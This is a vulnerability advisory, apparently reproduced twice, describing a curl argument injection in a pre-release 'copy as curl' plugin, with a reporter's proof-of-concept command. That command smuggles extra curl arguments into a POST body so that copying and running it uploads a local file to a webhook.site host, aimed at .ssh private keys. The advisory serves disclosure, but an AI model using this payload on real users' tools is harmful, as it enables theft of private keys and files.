Developers Note: This vulnerability affected a pre-release version (0.0.5) and while it's unlikely to be exploited I'd like to share it as it's pretty fun 🥳 Thank you to @Sim4n6 for testing and reporting 🙏
Original Report Follows unedited:
Summary
Some characters are not being escaped as expected which may lead to curl arguments injection ...in turn can be exploited to leak sensitive files.
curl -x http://127.0.0.1:8080 -k $'https://webhook.site/2f079076-58df-41d9-90e9-d362e01727a0/testing/endpoint' -X $'POST' -H $'Host: webhook.site' -H $'User-Agent: python-requests/2.31.0' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Cookie: secret=155ee356-23a6-11f0-af46-678665dcd42c' -H $'X-Forwarded-For: 127.0.0.1' -H $'Content-Length: 66' -H $'Content-Type: application/x-www-form-urlencoded' --data-binary $'action=delete&csrf=7e5dbebc12&aaaa\\\'%[email protected]%20-d\\\'da=ssss'
the command would be proxy a simple POST request when copied with the plugin it leaks the content of a file named sim4n6.txt.
PoC
https://youtu.be/m8lDrcUpNkQ
Impact
Arbitrary file read not very arbitrary though more .ssh private keys oriented
References
https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome
Sim4n6 Reporter
Developers Note: This vulnerability affected a pre-release version (0.0.5) and while it's unlikely to be exploited I'd like to share it as it's pretty fun 🥳 Thank you to @Sim4n6 for testing and reporting 🙏
Original Report Follows unedited:
Summary
Some characters are not being escaped as expected which may lead to curl arguments injection ...in turn can be exploited to leak sensitive files.
the command would be proxy a simple POST request when copied with the plugin it leaks the content of a file named sim4n6.txt.
PoC
https://youtu.be/m8lDrcUpNkQ
Impact
Arbitrary file read not very arbitrary though more .ssh private keys oriented
References
https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome